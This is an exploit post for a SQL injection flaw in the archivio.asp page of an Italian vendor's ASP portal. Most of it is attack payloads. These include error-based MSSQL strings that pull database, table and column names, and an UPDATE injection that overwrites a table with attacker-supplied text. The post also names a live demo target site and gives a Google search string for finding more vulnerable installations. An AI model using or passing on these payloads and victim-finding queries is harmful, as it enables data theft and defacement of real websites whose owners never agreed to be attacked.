ESA Software S.p.a. Asp/Portal www/archivio.asp Sql injection
Credit : CodeXpLoder'tq
Mail : codexploder[at]hotmail[dot]com
Site : codexploder.biyosecurity.net,biyofrm.com
Sourge : http://www.esasoftware.com
ЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈ
Thnx : Liz0ziM,eno7,sao,Crackers_child,erne,The_bekir,Di_lejyoner,3APA3A
Zeberus,Hacker_Onur,DesquneR,rapstarmurat,Uyussman
and
BiyoSecurity all members
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
1-) example.com/[patch]/archivio.asp?ID=sql methot)
1-) example.com/wwww/archivio.asp?ID=sql methot)
ЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈЈ
2-) example.com/[patch]/archivio.asp?ID=(sql methot)
2-) example.com/www/archivio.asp?ID=(sql methot)
2-) example.com/www/archivio.asp?ID=1'
2-) example.com/www/archivio.asp?ID=1 having 1=1
2-) example.com/www/archivio.asp?ID=1,2,3,4,5
2-) example.com/www/archivio.asp?ID=1,2,3,4,
5+update+tbl+set+column='your text or meta code';–
2-) example.com/events/archivio.asp?ID=1 group by tbl.column having 1=1
#for db : convert(int, db_name(1)
: convert(int, db_name(2)
#for other tbl : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))
#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))
#tbl : sezioni
#column : sezione
##########################################################
demo site: http://www.mondoesa-milano.com/www/archivio.asp?ID=5
google search code : inurl:"www/archivio.asp"
demo site tablo list : http://codexploder.biyosecurity.net/alltabllo.JPG